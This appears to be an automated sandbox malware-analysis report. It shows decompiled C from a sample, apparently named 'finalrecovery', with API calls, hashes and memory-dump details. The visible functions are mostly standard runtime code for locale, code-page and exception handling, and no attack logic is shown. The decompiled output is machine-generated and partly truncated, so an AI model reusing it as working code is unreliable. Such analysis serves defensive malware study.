					_t131 = _t131 + 0xc;
					_t113 = 0;
				}
				_push(_t123);
				if( *_t91 == _t113) {
					E00426623(_t84, _t91);
					goto L12;
				} else {
					if( *((intOrPtr*)( *_t116)) == _t113) {
						E00426743();
					} else {
						E004266AA(_t91);
					}
					if( *((intOrPtr*)(_t123 + 8)) == 0) {
						_t77 = E00426CB2("\xef\xbf\xbd)C", 0x40,						_t131 = _t131 + 0xc;
						if(_t77 != 0) {
							_push(_t123);
							if( *((intOrPtr*)( *_t116)) == 0) {
								E00426743();
							} else {
								E004266AA(0);
							}
							L12:
						}
					}
				}
				if( *((intOrPtr*)(_t123 + 8)) == 0) {
					L37:
					_t37 = 0;
					goto L38;
				} else {
					_t38 = _t84 + 0x100;
					if( *_t84 != 0 ||  *_t38 != 0) {
						_t39 = E00426B6F(_t38, _t123);
					} else {
						_t39 = GetACP();
					}
					_t125 = _t39;
					if(_t125 == 0 || _t125 == 0xfde8 || IsValidCodePage(_t125 & 0x0000ffff) == 0) {
						goto L37;
					} else {
						_t42 = _a8;
						if(_t42 != 0) {
							 *_t42 = _t125;
						}
						_t119 = _a12;
						if(_t119 == 0) {
							L36:
							_t37 = 1;
							L38:
							return _t37;
						} else {
							_t95 = _v8;
							_t15 = _t119 + 0x120; // 0xd0
							_t86 = _t15;
							 *_t86 = 0;
							_t16 = _t95 + 2; // 0x6
							_t114 = _t16;
							do {
								_t45 =  *_t95;
								_t95 = _t95 + 2;
							} while (_t45 != _v12);
							_t18 = (_t95 - _t114 >> 1) + 1; // 0x3
							_t47 = E0042515D(_t86, 0x55, _v8);
							_t132 = _t131 + 0x10;
							if(_t47 != 0) {
								L39:
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								E004134C4();
								asm("int3");
								_t130 = _t132;
								_t50 =  *0x43d054; // 0x8e1b5714
								_v52 = _t50 ^ _t132;
								_push(_t86);
								_push(_t125);
								_push(_t119);
								_t52 = E0041CAE3(_t97, _t114);
								_t87 = _t52;
								_t120 =  *(E0041CAE3(_t97, _t114) + 0x34c);
								_t127 = E0042745A(_v40);
								asm("sbb ecx, ecx");
								_t56 = GetLocaleInfoW(_t127, ( ~( *(_t52 + 0x64)) & 0xfffff005) + 0x1002,  &_v292, 0x78);
								if(_t56 != 0) {
									if(E00423962(_t120, _t127,  *((intOrPtr*)(_t87 + 0x54)),  &_v272) == 0 && E0042758C(_t127) != 0) {
										 *_t120 =  *_t120 | 0x00000004;
										_t120[2] = _t127;
										_t120[1] = _t127;
									}
									_t62 =  !( *_t120 >> 2) & 0x00000001;
								} else {
									 *_t120 =  *_t120 & _t56;
									_t62 = _t56 + 1;
								}
								_pop(_t121);
								_pop(_t128);
								_pop(_t88);
								return E0040EB3F(_t62, _t88, _v32 ^ _t130, _t114, _t121, _t128);
							} else {
								if(E0041E7A1(_t86, 0x1001, _t119, 0x40) == 0) {
									goto L37;
								} else {
									_t20 = _t119 + 0x80; // 0x30
									_t86 = _t20;
									_t21 = _t119 + 0x120; // 0xd0
									if(E0041E7A1(_t21, 0x1002, _t86, 0x40) == 0) {
										goto L37;
									} else {
										_push(0x5f);
										_t68 = E0042C0A7(_t97);
										_t97 = _t86;
										if(_t68 != 0) {
											L31:
											_t22 = _t119 + 0x120; // 0xd0
											if(E0041E7A1(_t22, 7, _t86, 0x40) == 0) {
												goto L37;
											} else {
												goto L32;
											}
										} else {
											_push(0x2e);
											_t73 = E0042C0A7(_t97);
											_t97 = _t86;
											if(_t73 == 0) {
												L32:
												_t119 = _t119 + 0x100;
												if(_t125 != 0xfde9) {
													E004132B8(_t97, _t125, _t119, 0x10, 0xa);
													goto L36;
												} else {
													_push(5);
													_t72 = E0042515D(_t119, 0x10, L"utf8");
													_t132 = _t132 + 0x10;
													if(_t72 != 0) {
														goto L39;
													} else {
														goto L36;
													}
												}
											} else {
												goto L31;
											}
										}
									}
								}
							}
						}
					}
				}
			}

0x00426d24
0x00426d25
0x00426d27
0x00426d2c
0x00426d33
0x00426d35
0x00426d38
0x00426d38
0x00426d3b
0x00426d3b
0x00426d41
0x00426d44
0x00426d47
0x00426d47
0x00426d4a
0x00426d4d
0x00426d4f
0x00426d55
0x00426d57
0x00426d5c
0x00426d66
0x00426d6b
0x00426d6d
0x00426d70
0x00426d70
0x00426d72
0x00426d76
0x00426dbf
0x00000000
0x00426d78
0x00426d7d
0x00426d86
0x00426d7f
0x00426d7f
0x00426d7f
0x00426d91
0x00426d9b
0x00426da0
0x00426da5
0x00426dab
0x00426daf
0x00426db8
0x00426db1
0x00426db1
0x00426db1
0x00426dc4
0x00426dc4
0x00426da5
0x00426d91
0x00426dca
0x00426f06
0x00426f06
0x00000000
0x00426dd0
0x00426dd0
0x00426dd9
0x00426dea
0x00426de0
0x00426de0
0x00426de0
0x00426df1
0x00426df5
0x00000000
0x00426e19
0x00426e19
0x00426e1e
0x00426e20
0x00426e20
0x00426e22
0x00426e27
0x00426f01
0x00426f03
0x00426f08
0x00426f0c
0x00426e2d
0x00426e2d
0x00426e30
0x00426e30
0x00426e38
0x00426e3b
0x00426e3b
0x00426e3e
0x00426e3e
0x00426e41
0x00426e44
0x00426e4e
0x00426e58
0x00426e5d
0x00426e62
0x00426f0d
0x00426f0f
0x00426f10
0x00426f11
0x00426f12
0x00426f13
0x00426f14
0x00426f19
0x00426f1d
0x00426f25
0x00426f2c
0x00426f2f
0x00426f30
0x00426f34
0x00426f35
0x00426f3a
0x00426f42
0x00426f51
0x00426f5d
0x00426f6e
0x00426f76
0x00426f90
0x00426f9d
0x00426fa0
0x00426fa3
0x00426fa3
0x00426fad
0x00426f78
0x00426f78
0x00426f7a
0x00426f7a
0x00426fb3
0x00426fb4
0x00426fb7
0x00426fbe
0x00426e68
0x00426e78
0x00000000
0x00426e7e
0x00426e80
0x00426e80
0x00426e8c
0x00426e9a
0x00000000
0x00426e9c
0x00426e9c
0x00426e9f
0x00426ea5
0x00426ea8
0x00426eb8
0x00426ebd
0x00426ecb
0x00000000
0x00000000
0x00000000
0x00000000
0x00426eaa
0x00426eaa
0x00426ead
0x00426eb3
0x00426eb6
0x00426ecd
0x00426ecd
0x00426ed9
0x00426ef9
0x00000000
0x00426edb
0x00426edb
0x00426ee5
0x00426eea
0x00426eef
0x00000000
0x00426ef1
0x00000000
0x00426ef1
0x00426eef
0x00000000
0x00000000
0x00000000
0x00426eb6
0x00426ea8
0x00426e9a
0x00426e78
0x00426e62
0x00426e27
0x00426df5

APIs

Part of subcall function 0041CAE3: GetLastError.KERNEL32(?,?,?,004135E1,?,00000000,00405D9E,?,00418114,?,00000000,74CB6490,?,0041820D,00405D9E,00000000), ref: 0041CAE8
Part of subcall function 0041CAE3: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00418114,?,00000000,74CB6490,?,0041820D,00405D9E,00000000,?,00405D9E,?), ref: 0041CB86

GetACP.KERNEL32(?,?,?,?,?,?,0041B6E3,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00426DE0
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,0041B6E3,?,?,?,00000055,?,-00000050,?,?), ref: 00426E0B
_wcschr.LIBVCRUNTIME ref: 00426E9F
_wcschr.LIBVCRUNTIME ref: 00426EAD
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00426F6E

Strings

utf8, xrefs: 00426EDD
)C, xrefs: 00426D96

Memory Dump Source

Source File: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.323409231.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_finalrecovery.jbxd

Yara matches

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
String ID: utf8$)C
API String ID: 4147378913-3322961178
Opcode ID: 1e4b7362e48a1a01d43ac940767bf56a8be7929704e6410f137690c61165a2d2
Instruction ID: 1ac1c2034c3d1488336133cf5d1b77168abf50f50dfeb51905c71ca67f6e6875
Opcode Fuzzy Hash: 1e4b7362e48a1a01d43ac940767bf56a8be7929704e6410f137690c61165a2d2
Instruction Fuzzy Hash: D1711A31B00225AADB25AB36FD46BB773A8EF44744F56402BF905D72C1EA7CD940875C

Uniqueness

Uniqueness Score: -1.00%

Function 00427680 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 183
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 90%

			E00427680(void* __ecx, void* __edx, void* __eflags, signed short _a4, short* _a8, short* _a12) {
				signed int _v8;
				int _v12;
				int _v16;
				char _v20;
				signed short* _v24;
				short* _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t39;
				void* _t45;
				signed short* _t46;
				signed short _t47;
				short* _t48;
				int _t49;
				void* _t53;
				short* _t55;
				short* _t56;
				short* _t57;
				int _t64;
				int _t66;
				short* _t70;
				intOrPtr _t73;
				void* _t75;
				short* _t76;
				intOrPtr _t83;
				short* _t86;
				short* _t89;
				short** _t99;
				short* _t100;
				signed short _t101;
				signed int _t104;
				void* _t105;

				_t39 =  *0x43d054; // 0x8e1b5714
				_v8 = _t39 ^ _t104;
				_t86 = _a12;
				_t101 = _a4;
				_v28 = _a8;
				_v24 = E0041CAE3(__ecx, __edx) + 0x50;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t45 = E0041CAE3(__ecx, __edx);
				_t97 = 0;
				 *((intOrPtr*)(_t45 + 0x34c)) =  &_v20;
				_t89 = _t101 + 0x80;
				_t46 = _v24;
				 *_t46 = _t101;
				_t99 =  &(_t46[2]);
				 *_t99 = _t89;
				if(_t89 != 0 &&  *_t89 != 0) {
					_t83 =  *0x4329e4; // 0x17
					E0042761F(_t89, 0, 0x4328d0, _t83 - 1, _t99);
					_t46 = _v24;
					_t105 = _t105 + 0xc;
					_t97 = 0;
				}
				_v20 = _t97;
				_t47 =  *_t46;
				if(_t47 == 0 ||  *_t47 == _t97) {
					_t48 =  *_t99;
					__eflags = _t48;
					if(_t48 == 0) {
						L19:
						_v20 = 0x104;
						_t49 = GetUserDefaultLCID();
						_v12 = _t49;
						_v16 = _t49;
						goto L20;
					}
					__eflags =  *_t48 - _t97;
					if(__eflags == 0) {
						goto L19;
					}
					E00426FC1(_t89, _t97, __eflags,  &_v20);
					_pop(_t89);
					goto L20;
				} else {
					_t70 =  *_t99;
					if(_t70 == 0) {
						L8:
						E004270A7(_t89, _t97, __eflags,  &_v20);
						L9:
						_pop(_t89);
						if(_v20 != 0) {
							_t100 = 0;
							__eflags = 0;
							L25:
							asm("sbb esi, esi");
							_t101 = E004274AB(_t89,  ~_t101 & _t101 + 0x00000100,  &_v20);
							__eflags = _t101;
							if(_t101 == 0) {
								L22:
								_t53 = 0;
								L23:
								return E0040EB3F(_t53, _t86, _v8 ^ _t104, _t97, _t100, _t101);
							}
							_t55 = IsValidCodePage(_t101 & 0x0000ffff);
							__eflags = _t55;
							if(_t55 == 0) {
								goto L22;
							}
							_t56 = IsValidLocale(_v16, 1);
							__eflags = _t56;
							if(_t56 == 0) {
								goto L22;
							}
							_t57 = _v28;
							__eflags = _t57;
							if(_t57 != 0) {
								 *_t57 = _t101;
							}
							E0041E89F(_v16,  &(_v24[0x128]), 0x55, _t100);
							__eflags = _t86;
							if(_t86 == 0) {
								L34:
								_t53 = 1;
								goto L23;
							}
							_t33 =  &(_t86[0x90]); // 0xd0
							E0041E89F(_v16, _t33, 0x55, _t100);
							_t64 = GetLocaleInfoW(_v16, 0x1001, _t86, 0x40);
							__eflags = _t64;
							if(_t64 == 0) {
								goto L22;
							}
							_t36 =  &(_t86[0x40]); // 0x30
							_t66 = GetLocaleInfoW(_v12, 0x1002, _t36, 0x40);
							__eflags = _t66;
							if(_t66 == 0) {
								goto L22;
							}
							_t38 =  &(_t86[0x80]); // 0xb0
							E004132B8(_t38, _t101, _t38, 0x10, 0xa);
							goto L34;
						}
						_t73 =  *0x4328cc; // 0x41
						_t75 = E0042761F(_t89, _t97, "\xef\xbf\xbd)C", _t73 - 1						_t105 = _t105 + 0xc;
						if(_t75 == 0) {
							L20:
							_t100 = 0;
							__eflags = 0;
							L21:
							if(_v20 != 0) {
								goto L25;
							}
							goto L22;
						}
						_t76 =  *_t99;
						_t100 = 0;
						if(_t76 == 0) {
							L14:
							E004270A7(_t89, _t97, __eflags,  &_v20);
							L15:
							_pop(_t89);
							goto L21;
						}
						_t118 =  *_t76;
						if( *_t76 == 0) {
							goto L14;
						}
						E0042700C(_t89, _t97, _t118,  &_v20);
						goto L15;
					}
					_t114 =  *_t70 - _t97;
					if( *_t70 == _t97) {
						goto L8;
					}
					E0042700C(_t89, _t97, _t114,  &_v20);
					goto L9;
				}
			}

0x00427688
0x0042768f
0x00427696
0x0042769a
0x0042769e
0x004276ac
0x004276b1
0x004276b2
0x004276b3
0x004276b4
0x004276bc
0x004276be
0x004276c4
0x004276ca
0x004276cd
0x004276cf
0x004276d2
0x004276d6
0x004276dd
0x004276ea
0x004276ef
0x004276f2
0x004276f5
0x004276f5
0x004276f7
0x004276fa
0x004276fe
0x0042776e
0x00427770
0x00427772
0x00427785
0x00427785
0x0042778c
0x00427792
0x00427795
0x00000000
0x00427795
0x00427774
0x00427777
0x00000000
0x00000000
0x0042777d
0x00427782
0x00000000
0x00427705
0x00427705
0x00427709
0x0042771b
0x0042771f
0x00427724
0x00427728
0x00427729
0x004277b1
0x004277b1
0x004277b3
0x004277bf
0x004277c9
0x004277cd
0x004277cf
0x004277a0
0x004277a0
0x004277a2
0x004277b0
0x004277b0
0x004277d5
0x004277db
0x004277dd
0x00000000
0x00000000
0x004277e4
0x004277ea
0x004277ec
0x00000000
0x00000000
0x004277ee
0x004277f1
0x004277f3
0x004277f5
0x004277f5
0x00427806
0x0042780b
0x0042780d
0x0042786d
0x0042786f
0x00000000
0x0042786f
0x00427812
0x0042781c
0x0042782c
0x00427832
0x00427834
0x00000000
0x00000000
0x0042783c
0x0042784b
0x00427851
0x00427853
0x00000000
0x00000000
0x0042785d
0x00427865
0x00000000
0x0042786a
0x0042772f
0x0042773e
0x00427743
0x00427748
0x00427798
0x00427798
0x00427798
0x0042779a
0x0042779e
0x00000000
0x00000000
0x00000000
0x0042779e
0x0042774a
0x0042774c
0x00427750
0x00427762
0x00427766
0x0042776b
0x0042776b
0x00000000
0x0042776b
0x00427752
0x00427755
0x00000000
0x00000000
0x0042775b
0x00000000
0x0042775b
0x0042770b
0x0042770e
0x00000000
0x00000000
0x00427714
0x00000000
0x00427714

APIs

Part of subcall function 0041CAE3: GetLastError.KERNEL32(?,?,?,004135E1,?,00000000,00405D9E,?,00418114,?,00000000,74CB6490,?,0041820D,00405D9E,00000000), ref: 0041CAE8
Part of subcall function 0041CAE3: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00418114,?,00000000,74CB6490,?,0041820D,00405D9E,00000000,?,00405D9E,?), ref: 0041CB86

Part of subcall function 0041CAE3: _free.LIBCMT ref: 0041CB45
Part of subcall function 0041CAE3: _free.LIBCMT ref: 0041CB7B

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 0042778C
IsValidCodePage.KERNEL32(00000000), ref: 004277D5
IsValidLocale.KERNEL32(?,00000001), ref: 004277E4
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 0042782C
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 0042784B

Strings

)C, xrefs: 00427739

Memory Dump Source

Source File: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.323409231.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_finalrecovery.jbxd

Yara matches

Similarity

API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
String ID: )C
API String ID: 949163717-1336023901
Opcode ID: 62cf3f50e14746fb3c118b06f4c18b659e402b76327ea2da0e734593f5dbc1e5
Instruction ID: d4509d60825681c832198d9f8fea18a541154355106cd49d55bca7286e9735fd
Opcode Fuzzy Hash: 62cf3f50e14746fb3c118b06f4c18b659e402b76327ea2da0e734593f5dbc1e5
Instruction Fuzzy Hash: DD518571B042259FDB10EF65EC45ABF77B8AF48700F94447AE900E7250E778A944CB69

Uniqueness

Uniqueness Score: -1.00%

Function 004274AB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 94%

			E004274AB(void* __ecx, signed int _a4, intOrPtr _a8) {
				short _v8;
				short _t17;
				signed int _t18;
				signed int _t23;
				signed int _t25;
				signed int _t26;
				signed int _t27;
				void* _t30;
				void* _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr* _t36;
				intOrPtr* _t37;

				_push(__ecx);
				_t23 = _a4;
				if(_t23 == 0) {
					L21:
					if(GetLocaleInfoW( *(_a8 + 8), 0x20001004,  &_v8, 2) != 0) {
						_t17 = _v8;
						if(_t17 == 0) {
							_t17 = GetACP();
						}
						L25:
						return _t17;
					}
					L22:
					_t17 = 0;
					goto L25;
				}
				_t18 = 0;
				if( *_t23 == 0) {
					goto L21;
				}
				_t36 = L"ACP";
				_t25 = _t23;
				while(1) {
					_t30 =  *_t25;
					if(_t30 !=  *_t36) {
						break;
					}
					if(_t30 == 0) {
						L7:
						_t26 = _t18;
						L9:
						if(_t26 == 0) {
							goto L21;
						}
						_t37 = L"OCP";
						_t27 = _t23;
						while(1) {
							_t31 =  *_t27;
							if(_t31 !=  *_t37) {
								break;
							}
							if(_t31 == 0) {
								L17:
								if(_t18 != 0) {
									_t17 = E0041C782(_t23, _t23);
									goto L25;
								}
								if(GetLocaleInfoW( *(_a8 + 8), 0x2000000b,  &_v8, 2) == 0) {
									goto L22;
								}
								_t17 = _v8;
								goto L25;
							}
							_t32 =  *((intOrPtr*)(_t27 + 2));
							if(_t32 !=  *((intOrPtr*)(_t37 + 2))) {
								break;
							}
							_t27 = _t27 + 4;
							_t37 = _t37 + 4;
							if(_t32 != 0) {
								continue;
							}
							goto L17;
						}
						asm("sbb eax, eax");
						_t18 = _t18 | 0x00000001;
						goto L17;
					}
					_t33 =  *((intOrPtr*)(_t25 + 2));
					if(_t33 !=  *((intOrPtr*)(_t36 + 2))) {
						break;
					}
					_t25 = _t25 + 4;
					_t36 = _t36 + 4;
					if(_t33 != 0) {
						continue;
					}
					goto L7;
				}
				asm("sbb edx, edx");
				_t26 = _t25 | 0x00000001;
				goto L9;
			}

0x004274b0
0x004274b1
0x004274b8
0x0042755c
0x00427575
0x0042757b
0x00427580
0x00427582
0x00427582
0x00427588
0x0042758b
0x0042758b
0x00427577
0x00427577
0x00000000
0x00427577
0x004274be
0x004274c3
0x00000000
0x00000000
0x004274c9
0x004274ce
0x004274d0
0x004274d0
0x004274d6
0x00000000
0x00000000
0x004274db
0x004274f2
0x004274f2
0x004274fb
0x004274fd
0x00000000
0x00000000
0x004274ff
0x00427504
0x00427506
0x00427506
0x0042750c
0x00000000
0x00000000
0x00427511
0x0042752f
0x00427531
0x00427554
0x00000000
0x00427559
0x0042754c
0x00000000
0x00000000
0x0042754e
0x00000000
0x0042754e
0x00427513
0x0042751b
0x00000000
0x00000000
0x0042751d
0x00427520
0x00427526
0x00000000
0x00000000
0x00000000
0x00427528
0x0042752a
0x0042752c
0x00000000
0x0042752c
0x004274dd
0x004274e5
0x00000000
0x00000000
0x004274e7
0x004274ea
0x004274f0
0x00000000
0x00000000
0x00000000
0x004274f0
0x004274f6
0x004274f8
0x00000000

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,004277C9,00000002,00000000,?,?,?,004277C9,?,00000000), ref: 00427544
GetLocaleInfoW.KERNEL32(?,20001004,004277C9,00000002,00000000,?,?,?,004277C9,?,00000000), ref: 0042756D
GetACP.KERNEL32(?,?,004277C9,?,00000000), ref: 00427582

Strings

ACP, xrefs: 004274C9
OCP, xrefs: 004274FF

Memory Dump Source

Source File: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.323409231.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_finalrecovery.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: d473ddd763a2c2c897fe5dcf6db478f1cae410dc6a90a74f6531b1057af5c91b
Instruction ID: 90c49e5929fcb85c1d91b10e44f9db7d24533e5021ea7a668e092faea0230e18
Opcode Fuzzy Hash: d473ddd763a2c2c897fe5dcf6db478f1cae410dc6a90a74f6531b1057af5c91b
Instruction Fuzzy Hash: A021D632708121B6DB349F14ED01AA7B3A6EB54B54BD68436E909C7610E73AEEC1C359

Uniqueness

Uniqueness Score: -1.00%

Function 004132EB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 78%

			E004132EB(intOrPtr __ebx, intOrPtr __edx, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				intOrPtr _v800;
				char _v804;
				struct _EXCEPTION_POINTERS _v812;
				void* __edi;
				signed int _t40;
				char* _t47;
				char* _t49;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				intOrPtr _t66;
				int _t67;
				intOrPtr _t68;
				signed int _t69;

				_t68 = __esi;
				_t65 = __edx;
				_t60 = __ebx;
				_t40 =  *0x43d054; // 0x8e1b5714
				_t41 = _t40 ^ _t69;
				_v8 = _t40 ^ _t69;
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E0040F76B(_t41);
					_pop(_t61);
				}
				E00410A80(_t66,  &_v804, 0, 0x50);
				E00410A80(_t66,  &_v724, 0, 0x2cc);
				_v812.ExceptionRecord =  &_v804;
				_t47 =  &_v724;
				_v812.ContextRecord = _t47;
				_v548 = _t47;
				_v552 = _t61;
				_v556 = _t65;
				_v560 = _t60;
				_v564 = _t68;
				_v568 = _t66;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_v540 = _v0;
				_t49 =  &_v0;
				_v528 = _t49;
				_v724 = 0x10001;
				_v544 =  *((intOrPtr*)(_t49 - 4));
				_v804 = _a8;
				_v800 = _a12;
				_v792 = _v0;
				_t67 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				if(UnhandledExceptionFilter( &_v812) == 0 && _t67 == 0 && _a4 != 0xffffffff) {
					_push(_a4);
					_t57 = E0040F76B(_t57);
				}
				return E0040EB3F(_t57, _t60, _v8 ^ _t69, _t65, _t67, _t68);
			}

0x004132eb
0x004132eb
0x004132eb
0x004132f6
0x004132fb
0x004132fd
0x00413305
0x00413307
0x0041330a
0x0041330f
0x0041330f
0x0041331b
0x0041332e
0x0041333c
0x00413342
0x00413348
0x0041334e
0x00413354
0x0041335a
0x00413360
0x00413366
0x0041336c
0x00413372
0x00413379
0x00413380
0x00413387
0x0041338e
0x00413395
0x0041339c
0x0041339d
0x004133a6
0x004133ac
0x004133af
0x004133b5
0x004133c2
0x004133cb
0x004133d4
0x004133dd
0x004133eb
0x004133ed
0x00413402
0x0041340e
0x00413411
0x00413416
0x00413423

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 004133E3
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 004133ED
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 004133FA

Strings

W7@, xrefs: 004132ED

Memory Dump Source

Source File: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.323409231.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_finalrecovery.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID: W7@
API String ID: 3906539128-1885929603
Opcode ID: 3127bc4b47b8940ce26c548bf42a7b7d0cd117a66623673f01a1a8e442e3d1bf
Instruction ID: 3d63a0ada379e1d30a62e6f40e8ec19a37cfc804e77d6f7cae49c18167352078
Opcode Fuzzy Hash: 3127bc4b47b8940ce26c548bf42a7b7d0cd117a66623673f01a1a8e442e3d1bf
Instruction Fuzzy Hash: F831E3749012289BCB21DF69D989BDDBBB8BF08711F5041EAE41CA7290E7749FC58F48

Uniqueness

Uniqueness Score: -1.00%

Function 0040F575 Relevance: 6.1, APIs: 4, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E0040F575(intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4) {
				char _v0;
				struct _EXCEPTION_POINTERS _v12;
				intOrPtr _v80;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v608;
				intOrPtr _v612;
				void* _v616;
				intOrPtr _v620;
				char _v624;
				intOrPtr _v628;
				intOrPtr _v632;
				intOrPtr _v636;
				intOrPtr _v640;
				intOrPtr _v644;
				intOrPtr _v648;
				intOrPtr _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				intOrPtr _v664;
				intOrPtr _v668;
				char _v808;
				char* _t39;
				long _t49;
				intOrPtr _t51;
				void* _t54;
				intOrPtr _t55;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr* _t60;

				_t59 = __esi;
				_t58 = __edi;
				_t57 = __edx;
				if(IsProcessorFeaturePresent(0x17) != 0) {
					_t55 = _a4;
					asm("int 0x29");
				}
				E0040F76B(_t34);
				 *_t60 = 0x2cc;
				_v632 = E00410A80(_t58,  &_v808, 0, 3);
				_v636 = _t55;
				_v640 = _t57;
				_v644 = _t51;
				_v648 = _t59;
				_v652 = _t58;
				_v608 = ss;
				_v620 = cs;
				_v656 = ds;
				_v660 = es;
				_v664 = fs;
				_v668 = gs;
				asm("pushfd");
				_pop( *_t15);
				_v624 = _v0;
				_t39 =  &_v0;
				_v612 = _t39;
				_v808 = 0x10001;
				_v628 =  *((intOrPtr*)(_t39 - 4));
				E00410A80(_t58,  &_v92, 0, 0x50);
				_v92 = 0x40000015;
				_v88 = 1;
				_v80 = _v0;
				_t28 = IsDebuggerPresent() - 1; // -1
				_v12.ExceptionRecord =  &_v92;
				asm("sbb bl, bl");
				_v12.ContextRecord =  &_v808;
				_t54 =  ~_t28 + 1;
				SetUnhandledExceptionFilter(0);
				_t49 = UnhandledExceptionFilter( &_v12);
				if(_t49 == 0 && _t54 == 0) {
					_push(3);
					return E0040F76B(_t49);
				}
				return _t49;
			}

0x0040f575
0x0040f575
0x0040f575
0x0040f589
0x0040f58b
0x0040f58e
0x0040f58e
0x0040f592
0x0040f597
0x0040f5af
0x0040f5b5
0x0040f5bb
0x0040f5c1
0x0040f5c7
0x0040f5cd
0x0040f5d3
0x0040f5da
0x0040f5e1
0x0040f5e8
0x0040f5ef
0x0040f5f6
0x0040f5fd
0x0040f5fe
0x0040f607
0x0040f60d
0x0040f610
0x0040f616
0x0040f625
0x0040f631
0x0040f63c
0x0040f643
0x0040f64a
0x0040f655
0x0040f65d
0x0040f666
0x0040f668
0x0040f66b
0x0040f66d
0x0040f677
0x0040f67f
0x0040f685
0x00000000
0x0040f68c
0x0040f68f

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0040F581
IsDebuggerPresent.KERNEL32 ref: 0040F64D
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040F66D
UnhandledExceptionFilter.KERNEL32(?), ref: 0040F677

Memory Dump Source

Source File: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.323409231.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_finalrecovery.jbxd

Yara matches

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: b905c57fb93a7ea2142a1a6e2d5c4873a38ca60d89c803f25540929c33dac397
Instruction ID: bdde925d5d2ed3d21a984856afbab9e073522e1997f23bebbda1fc381632bbc5
Opcode Fuzzy Hash: b905c57fb93a7ea2142a1a6e2d5c4873a38ca60d89c803f25540929c33dac397
Instruction Fuzzy Hash: 8C314B75D413189BDB20DFA5D989BCDBBB8AF08304F1041FAE40DA7290EB755A898F49

Uniqueness

Uniqueness Score: -1.00%

Function 10002F80 Relevance: 6.1, APIs: 4, Instructions: 73
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E10002F80(intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4) {
				char _v0;
				struct _EXCEPTION_POINTERS _v12;
				intOrPtr _v80;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v608;
				intOrPtr _v612;
				void* _v616;
				intOrPtr _v620;
				char _v624;
				intOrPtr _v628;
				intOrPtr _v632;
